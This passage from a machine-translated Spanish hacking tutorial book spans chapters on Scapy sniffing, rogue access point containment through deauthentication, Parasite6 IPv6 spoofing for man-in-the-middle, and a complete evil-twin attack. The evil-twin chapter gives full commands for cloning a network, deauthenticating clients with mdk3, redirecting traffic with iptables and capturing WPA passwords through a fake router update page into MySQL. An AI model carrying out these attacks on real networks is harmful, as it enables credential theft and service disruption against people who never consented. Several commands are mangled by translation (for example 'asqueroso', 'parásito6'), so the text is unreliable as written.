comportamiento extraño, y podríamos descubrir una vulnerabilidad en este proceso.
Para salir de Scapy, debe presionar "Ctrl + d" y eso lo llevará de regreso a un símbolo
del sistema normal. Pero, si desea iniciar otro comando, debe iniciar Scapy
nuevamente escribiendo un comando;
"asqueroso"

Luego presiona enter. Otro comando que es muy peligroso, es cuando giramos
Machine Translated by Google

Scapy para convertirse en un rastreador. Si

escribe; “sniff(iface=''eth0'', prn=lambda x: x.show())”

Luego presione enter, esto significa que quiero que detecte todo el tráfico que pasa a través
de la interfaz ethernet0, y quiero que muestre cada paquete a medida que entra y pasa a
través de usted.

Después de presionar enter, la salida probablemente llenará este libro; pero quería compartir
con ustedes que Scapy no solo es capaz de crear paquetes, sino que también puede
convertirse en un intruso o un rastreador si así lo deseamos.

Por último, le pediré nuevamente que se asegure de tener una autorización por escrito para
usar Scapy en un entorno real o de producción.

Si solo está practicando en el laboratorio de su casa, en un entorno que no sea de


producción, eso no debería causar ningún problema a nadie; aún así, te sugiero que apagues
tu enrutador y practiques con cuidado sin ninguna conexión a Internet.
Machine Translated by Google

Capítulo 26 Ataque de desautenticación contra Rogue AP

Hay muchas técnicas diferentes para contener un punto de acceso no autorizado en una red
inalámbrica y en este escenario; vamos a utilizar WLC para hacerlo. Pero antes de pensar en
contener un punto de acceso no autorizado, primero debemos identificarlo. Una vez más, hay
varias formas de identificar un punto de acceso no autorizado, y ya discutimos algunas de
ellas, así que imagine el siguiente escenario.

Imagine que está utilizando un analizador de canales para identificar posibles fuentes de
interferencia, en un entorno en el que se transmiten varios SSID, pero uno de ellos utiliza una
autenticación abierta, mientras que el resto de los SSID utilizan WPA2-Enterprise for Security.

Bueno, es muy probable que si se trata de una infraestructura corporativa, lo que estaríamos
viendo es algún punto de acceso que es un dispositivo no autorizado que está tratando de atraer
algunos clientes.

Si alguien en su entorno, ya sea en un aeropuerto o en su red corporativa, está emulando o


falsificando su SSID tratando de atraer a las personas, es muy probable que sea malicioso.

En segundo lugar, si tenemos un cliente que se asocia con este punto de acceso no autorizado
y comienza a usarlo, entonces el atacante que tiene ese punto de acceso no autorizado ahora
puede realizar un ataque de intermediario y espiar todo el tráfico.

Así que esto es lo que vamos a hacer. Vamos a utilizar un controlador de LAN inalámbrica
también conocido como "WLC" porque el WLC sabe exactamente qué puntos de acceso
administra.

Lo bueno es que estos puntos de acceso no están sentados de forma predeterminada sirviendo
a sus clientes en sus respectivos canales, sino que también escanean periódicamente los otros
canales, recopilando información que envían al controlador de LAN inalámbrica.

Parte de esa información que recopila es información sobre los puntos de acceso que ven.
Cuando el controlador de LAN inalámbrica ve un punto de acceso que no administra, no es
parte de la familia de controladores inalámbricos, clasificará ese punto de acceso como "falso".

Por lo tanto, nuestro primer paso dentro del WLC es echar un vistazo y ver si el controlador
conoce algún punto de acceso no autorizado, y después de encontrar ese acceso
Machine Translated by Google

punto, daremos el siguiente paso lógico, y es contenerlo desde el controlador.

En la página principal de WLC, la página de "monitor" en la esquina superior derecha nos


mostrará los detalles sobre los puntos de acceso no autorizados activos en "Resumen no
autorizado".

Si usa un WLC, es posible que vea varios dispositivos enumerados allí y pregunte; Bueno,
¿cómo es que hay tantos puntos de acceso no autorizados? Puede haber varias razones
para esto. Por ejemplo, su WLC puede ver 10 o incluso más puntos de acceso no
autorizados, y es posible que todos sean completamente legítimos, es solo que su WLC
no los está administrando, por lo tanto, los clasifica como no autorizados.

Todos esos otros SSID transmitidos que están siendo vistos por uno o más de esos
puntos de acceso que administra el WLC y se informan al controlador y es por eso que el
controlador los coloca en la categoría de pícaro.

Simplemente no sabe quiénes son esos dispositivos. Para echar un vistazo a los detalles
de estos puntos de acceso no autorizados, simplemente hacemos clic en el enlace
"detalle" y lo que vamos a ver es la lista de puntos de acceso, incluidas sus direcciones
MAC, SSID, canales que están usando, cuántos radios que están usando, cuántos
clientes están conectados a ellos.

Para obtener más información sobre el dispositivo, podemos hacer clic en su dirección
mac y nos llevará a la ventana "Rouge AP Detail". Aquí, si observamos los detalles de
ese punto de acceso, podemos ver la dirección MAC del dispositivo, la primera vez que
fue visto por el WLC, la última vez fue informada al WLC, y abajo, cerca de la parte
inferior, están los puntos de acceso que se reportan en primer lugar.

Allí, podemos ver que el AP o los AP informan que vieron el punto de acceso no autorizado
en qué canal y también incluyen información como un indicador de intensidad de la señal
de recepción y la relación señal-ruido.

Ahora te estarás preguntando; bueno, eso es genial y sabemos que tenemos un punto de
acceso no autorizado, pero ¿cómo contenemos ese dispositivo, cómo lo apagamos?

Bueno, vamos a tomar nuestros puntos de acceso que, además de admitir a los clientes
normales, también van a dedicar un poco de tiempo adicional a los que actualmente
pueden ver ese punto de acceso no autorizado y van a realizar de manera efectiva un
ataque de denegación de servicio. contra ese punto de acceso.
Machine Translated by Google

Lo hará mediante el uso de mensajes de "desautenticación". Ahora, si un cliente está


tratando de asociarse con ese punto de acceso no autorizado, porque estos puntos de
acceso envían estos mensajes de "desautenticación", estos puntos de acceso también
serán falsificados, lo cual es una buena forma de mentir sobre la dirección MAC
involucrada. , por lo que nuestro cliente o cualquier otro cliente que intente trabajar con el
punto de acceso no autorizado será atacado con mensajes de "desautenticación".

El objetivo aquí es asegurarse de que el punto de acceso que no es administrado por


nosotros para asegurarse de que ningún cliente válido se asocie con eso. También quiero
señalar algo muy importante con respecto a apagar o hacer un punto de acceso de "ataque
de desautenticación".

Atacar su propio punto de acceso no es un gran problema, sin embargo, debo señalar que
atacar la red de área local inalámbrica de otra persona es un gran problema y
definitivamente nunca querrá hacer eso contra ninguna otra red legítima, porque causará
un ataque de denegación de servicio contra esa red.

Entonces, para hacer eso mirando los detalles del AP no autorizado, todo lo que tenemos
que hacer es ir a "actualizar estado" y cambiar a "contener" en lugar de "alerta". A
continuación, la pregunta es cuántos puntos de acceso debemos usar para seguir adelante
y lidiar con esa contención.

La contención se puede definir bajo el título; “Número máximo de Aps para contener al
pícaro” Aquí, si solo tiene un punto de acceso que actualmente puede ver el dispositivo
pícaro, solo puede seleccionar uno para enviar los mensajes de “desautenticación”.

Una vez seleccionado, haga clic en "aplicar" para hacer ese cambio y le dará una pequeña
advertencia diciendo; “Puede haber problemas legales después de esta contención. ¿Estás

seguro de que quieres continuar?"

Como señalé anteriormente, esto podría ser ilegal, pero si es el propietario del punto de
acceso, puede hacer clic en "Aceptar". Ahora, ocurrirá un "ataque de desautenticación"
contra ese punto de acceso no autorizado, y permanecerá en su lugar hasta que lo
apaguemos.

Si todavía está en la misma página en "Detalle de AP no autorizado" junto al "Estado", el


estado dirá "contenido", que es lo que queríamos lograr. Si queremos apagar eso y
despegar el ataque, simplemente cambiaremos el estado
Machine Translated by Google

Vuelva a "alerta", haga clic en "aplicar" y se detendrán los ataques de


"desautenticación".
Mientras tanto, si tiene un analizador de protocolos, puede ver el número de marco
del punto de acceso no autorizado y, si sigue la transmisión, en "Tipo/Subtipo" verá
"Desautenticación", que es el "ataque de desautenticación" que hemos implementado
con el AP usando nuestro WLC contra el punto de acceso no autorizado.

Aunque parece que la dirección MAC de origen está involucrada, estos están siendo
iniciados por nuestros propios puntos de acceso para realizar un ataque. Si continúa
siguiendo ese flujo, vaya más abajo, continuará una y otra vez hasta que detengamos
el ataque al WLC.
El objetivo es asegurarse de que ningún cliente válido se asocie accidentalmente
con el punto de acceso no autorizado o, si lo hacen, no permanecerán allí mucho
tiempo debido a los mensajes periódicos de "desautenticación" que llegan y que
desasociarán a los clientes conectados. eso.

Como puede ver, si tiene un WLC en su organización, puede identificar y contener


rápidamente los puntos de acceso no autorizados. Pero una vez más me gustaría
recordarle que atacar la red de área local inalámbrica de otra persona no es legal y
puede tener problemas para hacerlo, así que asegúrese de tener una autorización
por escrito o la aprobación de su gerente para llevar a cabo dicha contención usando
WLC o cualquier otra herramienta.
Machine Translated by Google

Capítulo 27 Captura de paquetes IPv6 con Parasite6

Imagine que tiene una nueva asignación para pruebas de penetración, y la empresa tiene
dos redes que requieren ser violadas. Sin embargo, es muy probable que uno de ellos
sea fácil ya que no hay firewalls en su lugar.

Pero la segunda red parece más segura y podría tomar todo el día descubrir la posible
volnaribilidad para explotarla. Ciertas personas pueden comenzar con el fácil que se
puede hacer en menos de una hora.

Pero, si hace las preguntas correctas a la implementación de red actual que se está
ejecutando dentro de la empresa, puede ahorrarse un dolor de cabeza adicional y tener
un día fácil.

IPv6 se ejecuta como un protocolo válido en la mayoría de las computadoras en las empresas de hoy.
Por lo tanto, al tomar ciertas medidas para deshabilitarlo, podría aprovechar IPv6 de
acuerdo con su funcionamiento y comprometer la red mediante un ataque Man in the
Middle.

Si está al tanto de eso y sabe cómo descifrarlo, es posible que pueda terminar su prueba
de penetración en un corto período de tiempo, ya que es posible que la empresa no haya
habilitado todas las funciones de seguridad en la red como debería.

El ataque Man in the Middle se puede lograr con muchas herramientas y ya hemos
discutido algunas de ellas anteriormente. Una vez que nos estamos acercando a una red
IPv6, podemos usar otra gran herramienta llamada "Parasite6".

Volvamos a lo básico y pensemos en lo que sucede cuando la PC arranca por primera


vez mientras está conectada a una red. Por supuesto, la PC primero pediría una dirección
IP.

En este caso, una dirección IPv6 del enrutador que está en la misma red, o si hay un
servidor DHCP, entonces el servidor DHCP asignaría esa dirección IP a esa PC.

Luego, si esa PC comienza a comunicarse con la red externa o Internet, primero debe
aprender la dirección Mac del enrutador, y eso sucedería usando ARP o Protocolo de
resolución de direcciones, pero en IPv6 no existe tal cosa como ARP.

Lo que sucede en la red IPv6 en lugar de ARP es que la PC usaría un


Machine Translated by Google

“Neighbour Discovery”, específicamente llamado NDP o Neighbor Discovery


Protocol.

Lo que sucedería a continuación es que la PC enviaría un descubrimiento de


vecino, para ser más detallados, una solicitud de vecino a su enrutador, luego el
enrutador respondería con un anuncio de vecino.
Las solicitudes son pedir y la publicidad es dar la dirección que se ha solicitado.
Eso es genial, pero ¿cómo usaríamos Parasite6 aquí?
Bueno, nos uniríamos a la red con nuestra máquina Kali Linux que ejecuta
Parasite6, luego comenzaríamos a escuchar la red.
Una vez que Parasite6 está habilitado, comenzará a escuchar todos los mensajes
solicitados que pasan por la red y luego comenzará a responder.
Pero, en lugar de responder con los detalles correctos, responderíamos con
nuestra propia dirección Mac a todos en la red, haciendo que todos los dispositivos
de la red crean que somos el enrutador.

Todavía no tenemos un ataque Man in the Middle, en cambio tenemos un ataque


DoS o Denial of Service porque cada dispositivo de red que quiera conectarse a
Internet llegaría primero a nuestra máquina Kali, gracias a que Parasite6 está
habilitado.

Para convertir este ataque DoS en un ataque MITM, tendríamos que activar el
reenvío de IPv6 en nuestra máquina Kali Linux.
Lanzar Parasite6 en Kali es simple, todo lo que tiene que hacer es escribir el
comando:

"parásito6 interfaz1 (dirección mac falsa)"


Luego presiona enter. Esencialmente, debe escribir parasite6, luego especificar
qué interfaz desea conectar a la red y convertirse en un hombre en el medio,
luego escribir la dirección mac falsa que desea proporcionar a todos los demás
dispositivos finales o dispositivos de red que están conectados a la misma red.

Para la dirección mac falsa, cualquier dirección mac inventada funcionaría bien.
Otros comandos útiles que puede
implementar son: "parasite6 -l interface1 (falsa
dirección mac)" Esta vez agregué "–l" y eso representaría un bucle, lo que significa
que crearía un bucle y actualizaría el mensaje de solicitud cada 5 segundos. en
Machine Translated by Google

para mantener actualizada la información envenenada. También tienes otra opción si


escribes:
"parasite6 -r interface1 (dirección mac falsa)"
Esta vez usando "-r" que representa que también intentaría inyectar el destino de la
solicitud. Pero, para usar ambos, al mantener actualizada toda la información falsa
envenenada y también envenenar el destino de la solicitud, debemos usar el siguiente
comando: "parasite6 -lr interface1 (fake mac address)" A continuación, iniciando este
comando , escucharía todos los mensajes de solicitud de vecinos que recibe y

comenzaría a responder a todos ellos con su propia dirección falsa que hemos
especificado.

Asegúrese de tener una autorización por escrito antes de usar Parasite6, incluidas las
variaciones relacionadas con Parasite6, ya que podría causar un daño grave a todos
los dispositivos de red que están conectados a la red.
Si solo está practicando en el laboratorio de su casa, en un entorno que no sea de
producción, eso no debería causar ningún problema a nadie; aún así, te sugiero que
apagues tu enrutador y practiques con cuidado sin ninguna conexión a Internet.
Machine Translated by Google

Capítulo 28 Ataque de desautenticación de Evil Twin con mdk3

En este capítulo, le enseñaré cómo crear un punto de acceso gemelo malvado en


una máquina virtual Kali Linux. Además, le mostraré cómo usar el punto de acceso
gemelo malvado en combinación con algunas técnicas de ingeniería social para
obtener una contraseña WPA o WPA2 objetivo.
Para completar este ataque, deberá tener un adaptador de red USB que admita el
modo de monitor. Si aún no tiene un adaptador de red USB, el modo monitor es
compatible, ya recomendé adaptadores de red en algunos de los capítulos
anteriores.
Además, si ya entiendes cómo funciona el punto de acceso del gemelo malvado,
está bien, pero si no lo sabes, déjame explicarte lo que vamos a hacer para este
ataque.

Primero, vamos a crear un punto de acceso gemelo malvado y se llama gemelo


malvado porque es un clon de un punto de acceso auténtico. Por lo tanto,
encontramos una red inalámbrica a la que queremos apuntar, copiamos la
información de identificación de esa red, como su nombre y su dirección MAC, y
luego usamos esa información para crear nuestra propia red inalámbrica.

Tenga en cuenta que solo debe realizarse en redes inalámbricas de su propiedad.


Si no tiene dos redes inalámbricas, le sugiero que le pregunte a un vecino oa un
amigo si puede usar la de ellos para practicar.
Cuando un cliente se conecta a la red gemela malvada, no podrá distinguir entre
la red auténtica y la red gemela malvada. Luego, cuando el cliente abra su
navegador web, lo redirigiremos a una página de actualización de seguridad para
el enrutador, que le pedirá que ingrese su contraseña WPA o WPA2.

Cuando el cliente ingresa su contraseña WPA, la contraseña se almacenará en


una base de datos my SQL, que crearemos en unos momentos. Eso es todo lo
que vamos a hacer para este ataque.
Sigamos adelante y comencemos. Primero, necesitamos conectarnos a Internet y
lo lograremos compartiendo la conexión a Internet de nuestro sistema operativo
host con nuestra máquina virtual Kali Linux. De esta forma, eliminará la necesidad
de un segundo adaptador de red USB. Si salta a su sistema operativo host, no
importa qué tipo de sistema operativo esté
Machine Translated by Google

usando solo mientras pueda conectarse a Internet con él.

Continúe y abra su administrador de red y luego busque una red inalámbrica para
conectarse. Puede conectarse a su red doméstica, así que una vez hecho esto, ahora
que está conectado a Internet en su sistema operativo host, debemos compartirlo con
nuestra máquina virtual Kali Linux.

Por lo tanto, volvamos a Kali Linux y en la barra de menú superior necesitamos abrir el
menú de la máquina virtual y luego expandiremos el menú del adaptador de red, y aquí
debemos configurar nuestro adaptador de red para detección automática en puente.

Una vez que haya realizado esa configuración, puede continuar y permitir que el menú de
la máquina virtual se colapse y ahora podemos usar ese adaptador de red virtual para
establecer una conexión a Internet a través de nuestro sistema operativo host.

A continuación, abra su administrador de red, puede usar cualquier administrador de red


que tenga, y en su administrador de red debe encontrar la opción que dice "red cableada"
y luego hacer clic en "conectar".

Mientras se conecta, quiero señalar que si está utilizando el administrador de red


predeterminado y tiene problemas con la conexión por cable, le recomiendo instalar otro
administrador de red, como "Administrador de red WICD".

Ahora que tenemos una conexión a Internet, necesitamos instalar un servidor DHCP y
para aquellos de ustedes que no saben qué es un servidor DHCP, bueno, un servidor
DHCP se usa para asignar una dirección IP dentro de un rango específico a los clientes
que se conectan a un punto de acceso.

En este caso, lo usaremos para asignar una dirección IP a cualquier persona que se
conecte a nuestro punto de acceso del gemelo malvado. Continúe y cierre su administrador
de red y ahora necesitamos abrir una terminal y en la terminal vamos a escribir;

"apt-get install servidor dhcp3"

y luego presione ENTRAR. Ya instalé el servidor DHCP, pero es posible que reciba un
mensaje que le solicite que confirme la instalación, así que simplemente escriba "Y", que
significa "sí", y luego presione Entrar, y espere un momento para terminar la instalación.

Continuando, necesitamos configurar nuestro servidor DHCP, así que en la terminal


escribamos; “nano /etc/dhcpd.conf” y luego presione enter, y debería tener un archivo de

configuración de dhcp3 en blanco,


Machine Translated by Google

pero si no está en blanco, simplemente elimine el contenido existente antes de continuar.


Una vez que esté listo, comencemos a ingresar nuestras configuraciones. En la primera línea necesitamos
escribir; "autoritario;"

y luego presione ENTER para moverse hacia abajo a la siguiente línea y luego escriba; “tiempo de

arrendamiento predeterminado 600;”

y luego presione ENTER y muévase hacia abajo a la siguiente línea y escriba;

“tiempo máximo de arrendamiento 7200;”

y luego presione ENTER para bajar una línea y luego escriba;

"subred 192.168.1.128 máscara de red 255.255.255.128 {"

luego presione enter para moverse hacia abajo en la línea y escriba;

“opción máscara de subred 255.255.255.128;

luego presione enter para moverse hacia abajo en la línea y escriba;

“opción de dirección de transmisión 192.168.1.255;” y luego

presione ENTER para bajar una línea y escribir;

“opción de enrutadores 192.168.1.129;” y

luego presione ENTER para bajar una línea y escribir; “opción servidores de

nombres de dominio 8.8.8.8;” y luego presione ENTER para bajar una línea y

escribir;

“rango 192.168.1.130 192.168.1.140;”

y luego presione ENTER para bajar una línea y escribir; luego escriba un

corchete al revés; }

y eso es todo lo que necesitamos ingresar, ahora debemos guardar y cerrar el archivo. Pero antes de hacerlo,
compruebe que tiene la siguiente configuración en su terminal;

autoritario; tiempo

de arrendamiento predeterminado 600;


Machine Translated by Google

tiempo máximo de
arrendamiento 7200; subred 192.168.1.128 máscara de red
255.255.255.128 { opción máscara de subred 255.255.255.128;
opción dirección de difusión 192.168.1.255; enrutadores
opcionales 192.168.1.129; opción servidores de nombres de
dominio 8.8.8.8; rango 192.168.1.130 192.168.1.140; }

Una vez que haya verificado que su configuración es correcta, avancemos y guardemos esta
configuración.

Primero vamos a presionar las teclas “ctrl y X” juntas, luego presionaremos la tecla “Y”, y finalmente
presionaremos la tecla Enter. Ahora necesitamos descargar la página de actualización de seguridad
que el cliente verá cuando abra su navegador web.

Esta página web de muestra imita una actualización de seguridad para un enrutador Linksys, pero
en una prueba de penetración del mundo real, la página de muestra que estoy usando probablemente
sea irrelevante si está probando con una empresa que usa un portal cautivo o una página de destino.

Por ejemplo, le gustaría implementar una página web que se asemeje al portal cautivo de esa
empresa. Si está realizando una prueba de penetración en una red que utiliza Netgear, D-link o
Cisco, desea producir una página web que se identifique con esos fabricantes en particular.

Una vez que haya descargado el archivo zip del gemelo malvado, también debe descomprimirlo.
Una vez completado, estamos listos para iniciar nuestro servidor web Apache que nos permitirá alojar
nuestra página web de actualización de seguridad. Ahora tenemos que escribir;

“/etc/init.d/apache2 inicio”

y luego presione enter y ahora necesitamos iniciar My SQL, así que escribamos;

“/etc/init.d/mysql inicio”

y luego presione Enter y ahora que My SQL se está ejecutando, debemos iniciar sesión y crear una
base de datos que es donde almacenaremos la contraseña WPA que nuestro cliente ingresa en la
página de actualización de seguridad, así que escribamos; “mysql –u raíz”
Machine Translated by Google

y luego presione Entrar, y debería tener el indicador de MySQL. Aquí, vamos a crear una base
de datos llamada "gemelo malvado", así que escribamos;

“crear base de datos evil_twin;”

y luego presione ENTER, y ahora necesitamos crear una tabla con algunas columnas que
representarán los datos que el cliente ingresa en el campo de contraseña en nuestra página
de actualización de seguridad. Entonces, para pasar a nuestra nueva base de datos, debemos
escribir;

"usar evil_twin"

Y luego presione ENTER y ahora vamos a escribir; “create_table

wpa_keys(contraseña varchar(64), confirmar varchar(64));” y luego presione enter y,

en caso de que se lo pregunte, ese comando creó una tabla llamada "wpa_keys" que contiene
dos columnas. Uno se llama "contraseña" y el otro se llama "confirmar".

El 64 representa el número máximo de caracteres que se pueden almacenar en la columna, y


usamos 64 porque una contraseña WPA puede contener hasta 64 caracteres.

Continuando, necesitamos encontrar el nombre de la interfaz de nuestros adaptadores de red


virtual y nuestra dirección IP local porque los usaremos en futuros comandos.

Por lo tanto, abramos una nueva terminal y podemos dejar abierta la terminal My SQL porque
accederemos a ella más adelante. En la nueva terminal necesitamos teclear;

"espacio ip"

y luego presione Entrar, y siga adelante y busque el nombre de la interfaz de su adaptador de


red virtual y su dirección IP local. El nombre de mi interfaz es "eth0" y mi dirección IP local es
"192.168.0.6", pero la tuya puede ser diferente.

Abra un bloc de notas en blanco para realizar un seguimiento de esta información y siga
adelante y represente estos elementos de la manera que le muestro para que podamos
consultarlos fácilmente más adelante sin confusión.

Llamaremos a nuestro nombre de interfaz de adaptadores de red virtual nuestra interfaz


cableada y la mía es eth0 y luego llamaremos a nuestra dirección IP local nuestra IP local y la
mía es 192.168.0.1.
Machine Translated by Google

Interfaz cableada: eth0


Dirección IP local: 192.168.0.6

Ahora que hemos tomado nota de esa información, necesitamos encontrar el nombre de
la interfaz de nuestros adaptadores de red USB. Así que continúe y conecte su adaptador
de red USB si aún no lo ha hecho, y luego regresemos a la terminal. En la terminal
necesitamos teclear;

“Airmon-ng”

y luego presione ENTER y continúe y busque el nombre de la interfaz de su adaptador de


red USB. El nombre de su interfaz se muestra justo debajo de "Interfaz" y luego tomemos
nota de eso en su bloc de notas.
Lo llamaremos nuestra interfaz inalámbrica, y la mía es wlan0;

Interfaz inalámbrica: wlan0


y ahora necesitamos crear una interfaz de monitor, así que regresemos a la terminal y
debemos escribir;

“Inicio Airmon-ng [wlan0]”

y luego presione enter, luego continúe y busque el nombre de la interfaz de su monitor.


La interfaz del monitor se muestra dentro de la oración "(modo de monitor habilitado en
wlan0)" y luego tomemos nota de eso en su bloc de notas.
Lo llamaremos nuestra interfaz de monitor y la mía es mon0

“Interfaz de monitor: mon0”

y ahora vamos a usar "airodump" para encontrar la red inalámbrica que queremos clonar,
pero primero voy a compartir con ustedes algo que nos permitirá identificar el tipo de
enrutador que está usando la red de destino.

Por lo tanto, volvamos a la terminal y escribamos;

“airodump-ng-oui-update” y luego presione ENTER.

Aquí, espere un momento para descargar el archivo "OUI".


Esto nos proporciona una lista de fabricantes y formatos de direcciones MAC conocidos.
Lo que esto hace es permitir que "airodump" compare los BSSID de las redes descubiertas
con la lista y nos muestre el fabricante correspondiente en los resultados del escaneo.

Continuando, sigamos adelante y comencemos nuestro escaneo. Para hacer esto, necesitamos escribir;
Machine Translated by Google

"airodump-ng -M mon0" y luego

presione enter, y cuando encuentre la red inalámbrica a la que desea apuntar, debe presionar las
teclas "ctrl y C" para detener el escaneo. Ahora debemos tomar nota de los objetivos "ESSID", el
número de canal al que se hace referencia como "CH" y los objetivos "BSSID".

Por lo tanto, regresemos a su bloc de notas, y vamos a llamar a estos elementos "Target ESSID",
"Target Channel Number" y "Target BSSID", así que continúe, consulte su terminal y escriba estos
detalles de la siguiente manera:

ESSID de destino: freewifi

Número de canal de destino: 6

BSSID objetivo: aa:bb:cc:dd:ee:ff

Con respecto al ESSID, asegúrese de usar mayúsculas y minúsculas según sea necesario y luego
escriba el número de canal donde el mío usa 6 y luego para el BSSID, recomiendo simplemente
copiar y pegar para asegurarse de no cometer ningún error.

Para copiar texto desde el terminal Kali sin hacer clic con el botón derecho, simplemente puede
presionar las teclas "ctrl shift + C" para copiar cualquier texto. Al igual que si desea pegar texto,
puede presionar las teclas "ctrl shift + V".

Una vez que haya pegado esta información en el bloc de notas, ahora que tenemos la información
de nuestros objetivos, podemos crear un gemelo malvado. Así que volvamos a la terminal y ahora
tenemos que escribir; “airbase-ng –e freewifi –c 6 –P mon0”

Aquí, está haciendo referencia al ESSID de los objetivos, luego al número de canal de los objetivos,
que en mi caso es 6, y luego ingresa el nombre de la interfaz de su monitor, donde puede ver que
el mío es "mon0" y luego presiona Enter.

Ahora que nuestro punto de acceso del gemelo malvado está en funcionamiento, necesitamos
configurar nuestra interfaz de túnel para poder crear un puente entre nuestro punto de acceso del
gemelo malvado y nuestra interfaz cableada.

Así que sigamos adelante y abramos una nueva terminal, pero no cierre la terminal de la base aérea
ni la terminal My SQL. En la terminal necesitamos teclear; "ifconfig at0 192.168.1.129 máscara de

red 255.255.255.128"
Machine Translated by Google

Y luego presione enter. Ahora necesitamos agregar una tabla de enrutamiento y habilitar el
reenvío de IP para que podamos reenviar el tráfico hacia y desde nuestro punto de acceso
gemelo malvado, así que escribamos; "ruta agregar -net 192.168.1.128 máscara de red

255.255.255.128 gw 192.168.1.129" y luego presione enter. Ahora tenemos que escribir; “eco

1 > /proc/sys/net/ipv4/ip_forward”

y luego presione enter. Ahora necesitamos crear algunas reglas de iptables. Estas reglas
determinarán cómo se maneja el tráfico de red. Primero, vamos a crear una regla para
administrar el tráfico que debe ir a nuestra interfaz cableada, que es nuestra fuente de Internet,
así que escribamos;
“iptables - - table nat - -append POSTROUTING - -out-interface eth0 –j MASQUERADE”
masquerade debe escribirse en mayúsculas y luego presionar Enter. Ahora necesitamos crear
una regla para administrar el tráfico que ingresa a nuestra interfaz de túnel, así que escribamos;

"iptables - -append FORWARDA - -in-interface at0 -j ACCEPT" y luego presione

Enter. Ahora necesitamos crear una regla que permita las conexiones TCP en el puerto 80 y
las reenvíe a nuestro servidor web, por lo que debemos escribir;

“iptables -t nat -A PREROUTING –p tcp - -dport 80 –j DNAT - -to-destination 192.168.0.6:80”

y luego presione Entrar. Para la regla final, necesitamos crear una regla que nos permita
proporcionar una traducción de dirección de red y para hacer esto necesitamos escribir;

“iptables -t nat -A POSTROUTING –j MASQUERADE”

y luego presione Entrar. Ahora que tenemos las tablas de IP configuradas, debemos señalarlo
a nuestro archivo de configuración DHCP D e iniciar nuestro servidor DHCP, así que

escribamos; “dhcpd -cf /etc/dhcpd.conf –pf /var/run/dhcpd.pid at0” y luego presione enter.

Luego escriba; “/etc/init.d/isc-dhcp-server start” y luego presione enter. Ahora debería ver el

siguiente resultado:

“Iniciando el servidor DHCP de ISC: dhcpd”

Eso refleja que el servidor dhcp se inició y se inició correctamente. Por el último
Machine Translated by Google

paso, necesitamos obligar a los clientes de las redes de destino a conectarse a nuestro punto de acceso
gemelo malvado.

Para lograr esto, debemos desconectar a los clientes de la red de destino realizando un ataque de
desautenticación. Tenga en cuenta que hay varias formas de hacer esto, pero para este ataque usaremos
MDK3.

Primero, debemos crear un archivo de lista negra que contenga la dirección MAC o BSSID del objetivo.
Así que escribamos;

"Echo aa: bb: cc: dd: ee: ff> lista negra"

aa:bb:cc:dd:ee:ff aquí hace referencia al BSSID objetivo, así que simplemente copie eso de su bloc de
notas y luego péguelo en la terminal para ponerlo en la lista negra como se indica arriba y luego presione
ENTER.

Luego, para iniciar el ataque de desautenticación, debemos escribir;

“mdk3 mon0 d –b lista negra –c 6”

Aquí, debe ingresar el nombre de la interfaz de su monitor y el mío es mon0, y luego el número de canal
de destino y el mío es 6, y luego presione enter. Ahora puede pasar a la computadora que está usando
para simular una víctima.

Si el ataque de desautenticación tiene éxito, la computadora de la víctima debería perder la conexión


actual en cualquier momento. Una vez que la computadora de la víctima haya perdido su conexión, lo
que sucederá es que la computadora de la víctima intentará restablecer la conexión que acaba de perder,
sin embargo, debido a que hemos suspendido la red auténtica, debería conectarse a la red gemela
malvada. en lugar de.

Si regresa a la terminal airobase para ver la conexión, debería mostrar que alguien está conectado a su
punto de acceso gemelo malvado. Entonces, si regresa a la computadora de su víctima, puede abrir un
navegador web e intentar ir a google.com.

Aquí, debería ver que ha sido llevado a una página de actualización de seguridad y, como usuario, desea
asegurarse de que su enrutador esté actualizado en todas sus actualizaciones, particularmente como
actualizaciones de seguridad, por lo que le pedirá que ingrese su contraseña WPA ya que la actualización
del enrutador está solicitando.

Una vez que confirme la contraseña, haga clic en actualizar. Ahora regresemos a su terminal My SQL y
verifiquemos si pudo capturar la contraseña WPA.
Machine Translated by Google

En la terminal, necesitamos escribir;


"usar evil_twin"

y presiona enter. Luego vamos a escribir;


“seleccionar * de wpa_keys;” y luego presione

Entrar, y debería ver que la contraseña del cliente se almacenó en su base de datos
My SQL.
La contraseña debe mostrarse debajo de "contraseña" y la contraseña confirmada
está debajo de "confirmar" dentro de la base de datos My SQL.
Si el cliente hubiera ingresado una contraseña que no coincidía, habría sido llevado a
una página de error que le pediría que volviera a ingresar sus contraseñas porque no
coincidían.
Si el cliente hiciera clic en el botón de cancelar, habría sido llevado a una página que
le asegura la importancia de esta actualización de seguridad y que es por su propio
bien y que no podrá navegar por Internet hasta que realice la actualización. .

Así es como puede crear un punto de acceso gemelo malvado y configurar una página
web que capturará la contraseña WPA.
Asegúrese de tener una autorización por escrito antes de usar estas herramientas, ya
que podría causar un daño grave a todos los dispositivos de red que están conectados
a la red.

Si solo está practicando en el laboratorio de su casa, en un entorno que no sea de


producción, eso no debería causar ningún problema a nadie; aún así, te sugiero que
apagues tu enrutador y practiques con cuidado sin ninguna conexión a Internet.
Machine Translated by Google

Capítulo 29 Ataque DoS con MKD3

Otra amenaza a la seguridad empresarial es, por supuesto, los ataques DOS o de
denegación de servicio. Como sugiere el nombre, un ataque de denegación de servicio, si
tiene éxito, impide que otras personas utilicen el recurso o los servicios.

Interrumpe los servicios para otros usuarios. Hubo un caso en la prensa en el que un
individuo había decidido que estaba cansado de que la gente usara su teléfono celular
mientras conducía, por lo que conducía con un bloqueador celular en su automóvil y mientras
conducía estaba bloqueando todas las frecuencias en el celular. la red.

Así que los vehículos a su alrededor, esas personas no pueden usar sus teléfonos celulares
y usted podría decir, guau, esa es una gran idea, pero debe recordar que las fuerzas del
orden público, las ambulancias, también usan los servicios celulares.

Por lo tanto, cuando interrumpe frecuencias en la red celular para otras personas, también
las interrumpe para servicios que no desea interrumpir. Este individuo en particular fue
rastreado eventualmente, y una vez que lo encontraron, lo arrestaron y lo multaron
fuertemente.

Pero, ¿cómo se ejecuta un ataque de denegación de servicio? Bueno, en la tecnología


inalámbrica hay dos formas principales. El primero es bombardear su punto de acceso Wi-Fi
con tráfico inútil. Si crea mucho tráfico y el punto de acceso está tratando de decidir qué
hacer con eso, ¿procesa todas esas solicitudes de autenticación?

¿Qué sucede si envió una solicitud de sondeo y, aunque el punto de acceso se ocupa de
ese tráfico, no se ocupa del tráfico de otros usuarios? Entonces, básicamente, un enfoque
es simplemente ocupar el punto de acceso para que no pueda manejar el tráfico legítimo.

El segundo enfoque es simplemente crear ruido e interferencia en la banda de frecuencia


en la que está operando el punto de acceso. Puedo transmitir señales que simplemente
